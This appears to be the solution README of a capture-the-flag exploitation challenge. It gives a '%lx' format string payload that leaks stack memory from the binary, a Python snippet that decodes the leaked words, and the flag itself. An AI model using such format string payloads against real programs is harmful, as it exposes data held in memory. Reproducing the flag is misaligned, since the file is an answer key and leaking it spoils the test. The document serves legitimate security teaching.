30 lines
632 B
Markdown
30 lines
632 B
Markdown
## Difficulty
|
|
50/100
|
|
|
|
## Category
|
|
exploitation
|
|
|
|
## How To Solve
|
|
This binary contains a format string exploit. This can be
|
|
used to leak stack memory. Since the flag is read into
|
|
memory you can pass a format string to the binary and leak
|
|
all memory. A string like this would work
|
|
`%lx %lx %lx %lx %lx %lx %lx %lx %lx %lx %lx %lx %lx`.
|
|
You can then use python to take this memory and
|
|
convert it to a string.
|
|
|
|
```python
|
|
dump = [0x63537b4654434749, 0x64316b5f74703172, 0x3352615f73333164, 0x7d336d346c5f]
|
|
|
|
bs = b""
|
|
for b in dump:
|
|
bs += b.to_bytes(8, 'little');
|
|
|
|
print(bs)
|
|
```
|
|
|
|
## Hints
|
|
n/a
|
|
|
|
## Flag
|
|
IGCTF{Scr1pt_k1dd13s_aR3_l4m3} |